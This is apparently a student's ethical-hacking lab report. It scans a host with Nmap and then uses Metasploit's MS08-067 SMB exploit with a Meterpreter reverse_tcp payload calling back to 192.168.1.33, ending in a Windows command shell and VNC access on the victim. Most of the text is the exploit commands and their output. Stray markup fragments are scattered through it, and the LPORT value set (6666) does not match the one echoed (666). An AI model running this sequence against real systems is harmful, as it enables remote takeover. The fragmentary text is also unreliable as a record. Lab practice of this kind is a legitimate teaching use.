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Ethical Hacking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 Yang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March 2019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#3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Nessus Scan Report PDF is located in the ZIP File.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 for open ports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Nmap -n -sV 10.0.2.15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port number 445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Metasploit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exploit/windows/smb/ms08_067_netapi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243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options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0700" cy="3790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Msf exploit(ms08_067_netapi) &gt; set RHOST 10.0.2.15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RHOST =&gt; 10.0.2.15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Msf exploit(ms08_067_netapi) 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msf exploit(ms08_067_netapi) &gt; set payload windows/meterpreter/reverse_tcp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363.429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payload =&gt; windows/meterpreter/reverse_tcp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943600" cy="52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msf exploit(ms08_067_netapi) &gt; set LHOST 192.168.1.33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LHOST =&gt; 192.168.1.33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msf exploit(ms08_067_netapi) &gt; set LPORT 6666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363.429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LPORT =&gt; 666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3.429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msf exploit(ms08_067_netapi) &gt; exploit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Sysinfo to get system information of victim machine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vnc script using “run vnc”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Meterpreter &gt; shell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C:\WINDOWS\system32&gt;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943600" cy="135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I am in the windows command prompt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